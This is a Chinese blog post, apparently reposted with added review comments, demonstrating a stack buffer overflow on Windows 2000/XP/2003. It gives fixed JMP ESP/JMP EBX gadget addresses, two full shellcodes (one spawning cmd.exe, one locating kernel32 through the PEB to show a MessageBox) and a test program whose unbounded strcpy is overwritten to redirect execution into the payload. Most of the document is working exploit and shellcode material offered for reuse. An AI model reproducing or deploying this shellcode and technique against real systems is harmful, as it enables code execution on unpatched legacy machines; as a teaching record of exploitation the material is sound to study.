20061029 22:50:00 自己写的一个简单的溢出程序

对 Windows 2000、XP、2003 都通用的具有 JMP EBX 功能的地址是 0x7ffa1571，通用的具有 JMP ESP 功能的地址是 0x7ffa4512。（注意：这两个“通用地址”只对这几个没有 ASLR 的老系统成立，在 Vista 及之后开启了 ASLR 的系统上不能指望它们仍然有效；另外如果目标进程启用了硬件 DEP，跳到栈上执行 shellcode 这一步本身就会被拦截。）
弹出 cmd.exe 的 shellcode 是（功能：LoadLibraryA("MSVCRT.DLL") 之后 system("CMD.EXE")；其中嵌入的 LoadLibraryA 和 system 地址是某个 XP SP2 版本的硬编码值，不同语言版本/补丁的 kernel32.dll、msvcrt.dll 地址会不同，换系统要重新取）
 
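/*
 * Shellcode: LoadLibraryA("MSVCRT.DLL"); system("CMD.EXE").
 *
 * 83 bytes, NUL-free (so it can be delivered by strcpy, as name[] below does).
 * Both call targets are absolute addresses hard-coded for one XP SP2 build
 * (see the two comments); they must be re-resolved for any other kernel32.dll /
 * msvcrt.dll.
 *
 * NOTE(review): the original listing had the escapes `\x8D\x45F4` and
 * `\xC645\xFE` run together (each becomes a single out-of-range hex escape,
 * which C compilers reject or truncate); the bytes here are restored to match
 * the copy embedded in name[] in the test program below.
 * NOTE(review): nothing writes a NUL after the second 'L' of "MSVCRT.DLL";
 * the string presumably ends only because EAX still holds overflow()'s
 * `return 1` (0x00000001) when the three `push eax` run -- confirm before
 * reusing this from a different entry path.
 */
unsigned char shellcode_cmd[] =
"\x55\x8B\xEC\x50\x50\x50\xB8\x4D\x53\x56\x43\x89\x45"
"\xF4\xB8\x52\x54\x2E\x44\x89\x45\xF8\xC6\x45\xFC"
"\x4C\xC6\x45\xFD\x4C\x8D\x45\xF4\x50\xBA"
"\x77\x1D\x80\x7C" //Address of LoadLibraryA in WinXPSP2
"\xFF\xD2\x55\x8B\xEC\x83\xEC\x0C\xB8\x43\x4D\x44\x2E"
"\x89\x45\xF8\xC6\x45\xFC\x45\xC6\x45\xFD\x58\xC6\x45\xFE"
"\x45\x33\xD2\x88\x55\xFF\x8D\x45\xF8\x50\xB8"
"\xC7\x93\xBF\x77" //Address of system in WinXPSP2
"\xFF\xD0";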
 
 
弹出对话框的 shellcode（从字节看是：通过 PEB 找到 kernel32，按名字解析导出函数，然后 LoadLibraryA("user32")、MessageBoxA(0, "OK", "OK", 0)、ExitProcess，不依赖硬编码地址）。注意它含有多个 \x00 字节，不能像下面的测试程序那样用 strcpy 注入，要用 memcpy 之类按长度拷贝，或者先做编码去掉零字节。
 
/*
 * MessageBox shellcode, 223 bytes plus the literal's NUL.
 *
 * Finds kernel32 through the PEB, resolves exports by walking the PE export
 * table, then calls LoadLibraryA("user32"), MessageBoxA(0, "OK", "OK", 0)
 * and ExitProcess. Position-independent: the only absolute reference is
 * fs:[30h]. It contains many \x00 bytes, so unlike name[] below it cannot be
 * delivered with strcpy().
 *
 * NOTE(review): kernel32 is taken as the 2nd entry of the PEB's
 * InInitializationOrderModuleList, which holds on 2000/XP/2003; on Windows 7
 * and later that slot is kernelbase.dll, so the lookup would target the wrong
 * module there -- confirm before reusing.
 */
unsigned char sh4llcode[] =""

/* jmp +0A7h (to the call at the end, which pushes the string table's address);
   pop edx = &"LoadLibraryA"; mov eax, fs:[30h] (PEB); mov eax, [eax+0Ch] (Ldr) */
"\xE9\xA7\x00\x00\x00\x5A\x64\xA1\x30\x00\x00\x00\x8B\x40\x0C\x8B"
/* mov esi, [eax+1Ch]; lodsd; mov eax, [eax+8] -> DllBase of the 2nd module;
   push eax (module); push edx (name); push 0Ch (length); call resolver (+2Fh);
   pop ebx -> ebx = string table */
"\x70\x1C\xAD\x8B\x40\x08\x50\x52\x6A\x0C\xE8\x2F\x00\x00\x00\x5B"
/* add ebx, 0Dh -> "user32"; push ebx; call eax (LoadLibraryA);
   add ebx, 7 -> "MessageBoxA"; push ebx; push 0Bh; call resolver (+1Dh) */
"\x83\xC3\x0D\x53\xFF\xD0\x83\xC3\x07\x53\x6A\x0B\xE8\x1D\x00\x00"
/* pop ebx; add ebx, 18h -> "OK"; push 0; push ebx; push ebx; push 0;
   call eax (MessageBoxA(0, "OK", "OK", 0)); mov edx, 0Ch */
"\x00\x5B\x83\xC3\x18\x6A\x00\x53\x53\x6A\x00\xFF\xD0\xBA\x0C\x00"
/* pop eax (kernel32 base again); sub ebx, edx -> "ExitProcess"; push ebx;
   push edx (length); call resolver (+2, skipping the call eax);
   call eax (ExitProcess) -- the resolver's ret lands here;
   resolver entry: mov ebx, eax (module base) */
"\x00\x00\x58\x2B\xDA\x53\x52\xE8\x02\x00\x00\x00\xFF\xD0\x8B\xD8"
/* add eax, 3Ch; mov eax, [eax] (e_lfanew); add eax, ebx; cmp byte [eax], 'P';
   jne not-found; mov eax, [eax+78h] (export directory RVA); add eax, ebx */
"\x83\xC0\x3C\x8B\x00\x03\xC3\x80\x38\x50\x75\x49\x8B\x40\x78\x03"
/* push eax (export dir); mov ecx, eax; mov ecx, [ecx+14h] (NumberOfFunctions,
   used as the loop bound -- NumberOfNames is at +18h; over-reads if the two
   differ); mov eax, [eax+20h]; add eax, ebx (AddressOfNames); push ebp;
   mov ebp, eax; xor edx, edx (name index) */
"\xC3\x50\x8B\xC8\x8B\x49\x14\x8B\x40\x20\x03\xC3\x55\x8B\xE8\x33"
/* loop: push ecx; mov eax, [eax]; add eax, ebx (current name); mov edi, eax;
   mov esi, [esp+14h] (wanted name); mov ecx, [esp+10h] (its length) */
"\xD2\x51\x8B\x00\x03\xC3\x8B\xF8\x8B\x74\x24\x14\x8B\x4C\x24\x10"
/* cld; repe cmpsb; jne next; found: add esp, 4 (drop counter);
   mov eax, [esp+4] (export dir); mov eax, [eax+1Ch]; add eax, ebx
   (AddressOfFunctions) */
"\xFC\xF3\xA6\x75\x17\x83\xC4\x04\x8B\x44\x24\x04\x8B\x40\x1C\x03"
/* shl edx, 2; add eax, edx; mov eax, [eax]; add eax, ebx -> function address.
   NOTE(review): this indexes AddressOfFunctions by the name index and never
   reads AddressOfNameOrdinals; it presumably works on the XP-era kernel32 /
   user32 it was tested on, but is not correct for arbitrary DLLs.
   jmp done; next: inc edx; add ebp, 4 */
"\xC3\xC1\xE2\x02\x03\xC2\x8B\x00\x03\xC3\xEB\x0B\x42\x83\xC5\x04"
/* mov eax, ebp; pop ecx; loop; not-found: xor eax, eax; done: pop ebp;
   pop ecx (drop export dir); ret 4; call -0ACh (back to the pop edx at +5,
   leaving the string table address on the stack) */
"\x8B\xC5\x59\xE2\xCC\x33\xC0\x5D\x59\xC2\x04\x00\xE8\x54\xFF\xFF"
/* string table: "LoadLibraryA\0" "user32\0" "MessageBoxA\0" "ExitProcess\0" */
"\xFF\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x75\x73"
"\x65\x72\x33\x32\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F\x78\x41"
"\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00"
"OK" /* text and caption for MessageBoxA; its NUL is the C literal's terminator */
;
上面两个 shellcode 我在 Win XP SP2 + VC 6.0 下编译通过并执行成功；但“绝对可以使用”要打折扣：第一段依赖特定 XP SP2 版本的硬编码函数地址，第二段依赖 PEB 模块初始化顺序链表第二项就是 kernel32.dll 的老系统布局（Win7 起该位置是 kernelbase.dll），两者都要求目标进程没有开启 DEP。另外原文第一段 shellcode 里 `\x8D\x45F4` 和 `\xC645\xFE` 两处把转义拼到了一起（C 编译器会把 `\x45F4`、`\xC645` 当成一个超出范围的十六进制转义），正确字节以下面 name[] 里的 `\x8D\x45\xF4`、`\xC6\x45\xFE` 为准。
 
下面是测试代码：overflow() 用 strcpy 把 name[] 拷进 8 字节的 buf，12 字节填充盖掉 buf 和保存的 EBP，接着的 4 字节把返回地址改成 JMP ESP，ret 之后 ESP 正好指向紧随其后的 shellcode。栈布局对应 VC 6.0 默认（无优化）编译；换编译器或开了优化、/GS 之类的栈保护，偏移和可行性都会变。
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
 /*
  * Payload handed to overflow(): 99 bytes, no embedded NUL (strcpy-safe).
  *
  * Layout, for VC 6.0's default frame of overflow() (assumed; other
  * compilers or options change the offsets):
  *   [0..11]  filler covering buf[8] and the saved EBP
  *   [12..15] new return address 0x7ffa4512 = JMP ESP, little-endian
  *   [16..98] shellcode, which ESP points at right after ret
  * The shellcode does LoadLibraryA("MSVCRT.DLL") then system("CMD.EXE");
  * both addresses are hard-coded for one XP SP2 build.
  *
  * NOTE(review): no NUL is ever written at [ebp-2] after "MSVCRT.DL" "L";
  * the name presumably terminates only because EAX still holds overflow()'s
  * `return 1` (0x00000001) when the three `push eax` run. A different entry
  * path could leave it unterminated -- confirm before reusing.
  */
 char name[] =
     /* 12 filler bytes: buf[8] + saved EBP */
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     /* return address -> 0x7ffa4512 (JMP ESP) */
     "\x12\x45\xfa\x7f"
     /* ---- shellcode ---- */
     "\x55"                      /* push ebp                                   */
     "\x8B\xEC"                  /* mov  ebp, esp                              */
     "\x50\x50\x50"              /* push eax x3: 12 bytes of scratch           */
     "\xB8\x4D\x53\x56\x43"      /* mov  eax, 'MSVC'                           */
     "\x89\x45\xF4"              /* mov  [ebp-0Ch], eax                        */
     "\xB8\x52\x54\x2E\x44"      /* mov  eax, 'RT.D'                           */
     "\x89\x45\xF8"              /* mov  [ebp-8], eax                          */
     "\xC6\x45\xFC\x4C"          /* mov  byte [ebp-4], 'L'                     */
     "\xC6\x45\xFD\x4C"          /* mov  byte [ebp-3], 'L'  -> "MSVCRT.DLL"    */
     "\x8D\x45\xF4"              /* lea  eax, [ebp-0Ch]                        */
     "\x50"                      /* push eax                                   */
     "\xBA\x77\x1D\x80\x7C"      /* mov  edx, 7C801D77h  LoadLibraryA (XP SP2) */
     "\xFF\xD2"                  /* call edx                                   */
     "\x55"                      /* push ebp                                   */
     "\x8B\xEC"                  /* mov  ebp, esp                              */
     "\x83\xEC\x0C"              /* sub  esp, 0Ch                              */
     "\xB8\x43\x4D\x44\x2E"      /* mov  eax, 'CMD.'                           */
     "\x89\x45\xF8"              /* mov  [ebp-8], eax                          */
     "\xC6\x45\xFC\x45"          /* mov  byte [ebp-4], 'E'                     */
     "\xC6\x45\xFD\x58"          /* mov  byte [ebp-3], 'X'                     */
     "\xC6\x45\xFE\x45"          /* mov  byte [ebp-2], 'E'                     */
     "\x33\xD2"                  /* xor  edx, edx                              */
     "\x88\x55\xFF"              /* mov  [ebp-1], dl  -> NUL for "CMD.EXE"     */
     "\x8D\x45\xF8"              /* lea  eax, [ebp-8]                          */
     "\x50"                      /* push eax                                   */
     "\xB8\xC7\x93\xBF\x77"      /* mov  eax, 77BF93C7h  system (XP SP2)       */
     "\xFF\xD0";                 /* call eax                                   */
/*
 * Deliberately vulnerable sink for the demo -- do not "fix" it.
 *
 * str: NUL-terminated payload; here name[] (99 bytes + NUL), far longer than buf.
 * Returns 1. The value is not used by the caller, but it is presumably what
 * EAX still holds when the shellcode starts right after ret (the first
 * shellcode's "MSVCRT.DLL" string relies on that).
 *
 * strcpy() has no bound, so everything past buf's 8 bytes overwrites this
 * frame: with VC 6.0's default layout (assumed; other compilers/options
 * differ) the 12 filler bytes in name[] cover buf and the saved EBP, the next
 * 4 bytes replace the return address with JMP ESP, and after ret ESP points
 * at the shellcode that follows in name[].
 */
int overflow(char *str){
   char buf[8];       /* 8 bytes on the stack, no length check anywhere */
   strcpy(buf,str);   /* the overflow: writes strlen(str)+1 bytes into buf */
   return 1;
 }

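/*
 * Entry point of the overflow demo.
 *
 * Hands the crafted payload name[] to overflow(), whose unbounded strcpy()
 * overwrites its own return address with the JMP ESP gadget embedded in
 * name[], so control lands on the shellcode that follows. The author reports
 * this working on Windows XP SP2 with VC 6.0; the hard-coded addresses in
 * name[] will not hold elsewhere.
 *
 * Returns 0 on the normal path; in practice control is not expected to come
 * back from overflow(). (The unused local `int i` of the original was dropped.)
 */
int main(void)
{
    overflow(name);
    return 0;
}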
原文地址:https://www.cnblogs.com/herso/p/1419024.html